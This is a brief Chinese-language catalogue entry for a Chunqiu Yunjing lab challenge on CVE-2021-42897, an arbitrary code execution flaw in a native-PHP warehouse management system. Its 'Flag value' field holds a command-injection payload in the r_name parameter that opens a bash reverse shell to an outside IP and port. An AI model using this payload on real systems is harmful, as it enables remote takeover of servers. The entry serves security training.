CVE-2021-42897
| ID: | 14598 |
|---|---|
| 标题: | CVE-2021-42897 |
| 描述: | 该项目后台采用无框架的原生php开发,重点在于系统分析与设计,完成了仓库管理系统的基本功能。 wms中存在任意代码执行漏洞 |
| 类型: | WEB |
| 网站: | 春秋云境 |
| 题目链接: | https://yunjing.ichunqiu.com/cvevip |
| 赛事: | 春秋云境 |
| 年度: | None |
| Flag值: | "r_name=$(bash+-c+'bash+-i+>%26+/dev/tcp/42.192.226.104/9999+0<%261+2>%261')获取flag反弹shell并获取flag |
| writeup: | https://zhuanlan.zhihu.com/p/582560422" |